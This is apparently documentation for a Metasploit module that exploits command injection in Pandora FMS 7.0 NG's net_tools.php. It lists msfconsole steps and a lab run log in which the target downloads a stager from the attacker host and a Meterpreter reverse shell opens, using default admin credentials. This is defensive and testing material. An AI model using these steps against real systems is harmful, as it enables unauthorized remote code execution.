## Vulnerable Application

Pandora FMS (for Pandora Flexible Monitoring System) is software for
monitoring computer networks. Pandora FMS allows monitoring in a visual
way the status and performance of several parameters from different
operating systems, servers, applications and hardware systems such
as firewalls, proxies, databases, web servers or routers.

This module exploits a vulnerability found in Pandora FMS 7.0 NG and lower.
The vulnerability exists on the `net_tools.php` component, due to the insecure
usage of the `system()` PHP function.

This module has been tested with [Pandora FMS 7.0 NG](https://sourceforge.net/projects/pandora/files/Pandora%20FMS%207.0NG/Final/Pandora_FMS_7.0_NG_VmWare_ovf.zip/download)

## Verification Steps

Launch metasploit and set the appropriate options:

1.  Start `msfconsole`
2. `use exploit/linux/http/pandora_ping_cmd_exec`
3. `set RHOSTS <rhosts>`
4. `set LHOST <lhost>`
5. `set USERNAME <username>`
6. `set PASSWORD <password>`
7. `exploit`

## Options

  **USERNAME**

  The username for Pandora FMS.

  **PASSWORD**

  The password for Pandora FMS.


## Setup

https://pandorafms.com/docs/index.php?title=Pandora:Documentation_en:Installing

## Scenarios

 Tested Pandora FMS 7.0 NG on CentOS 7.3.1611

```
msf5 > use exploit/linux/http/pandora_ping_cmd_exec
msf5 exploit(linux/http/pandora_ping_cmd_exec) > set RHOSTS 192.168.215.128
RHOSTS => 192.168.215.128
msf5 exploit(linux/http/pandora_ping_cmd_exec) > set RHOSTS 192.168.1.12
RHOSTS => 192.168.1.12
msf5 exploit(linux/http/pandora_ping_cmd_exec) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf5 exploit(linux/http/pandora_ping_cmd_exec) > set USERNAME admin
USERNAME => admin
msf5 exploit(linux/http/pandora_ping_cmd_exec) > set PASSWORD pandora
PASSWORD => pandora
msf5 exploit(linux/http/pandora_ping_cmd_exec) > exploit

[*] Started reverse TCP handler on 192.168.1.5:4444
[*] Exploiting...
[*] Using URL: http://0.0.0.0:8080/ksdtisFA
[*] Local IP: http://192.168.1.5:8080/ksdtisFA
[*] Attempting to authenticate using (admin:pandora)
[+] Successfully authenticated
[*] Attempting to retrieve session cookie
[+] Successfully retrieved session cookie: PHPSESSID=knoo75fs75l00ec74atu8ic3d0; clippy=deleted; clippy=deleted;
[*] Client 192.168.1.12 (Wget/1.14 (linux-gnu)) requested /ksdtisFA
[*] Sending payload to 192.168.1.12 (Wget/1.14 (linux-gnu))
[*] Sending stage (989416 bytes) to 192.168.1.12
[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 192.168.1.12:54784) at 2020-03-09 15:38:25 +0300

[*] Command Stager progress - 131.25% done (147/112 bytes)
[*] Server stopped.

meterpreter >
```
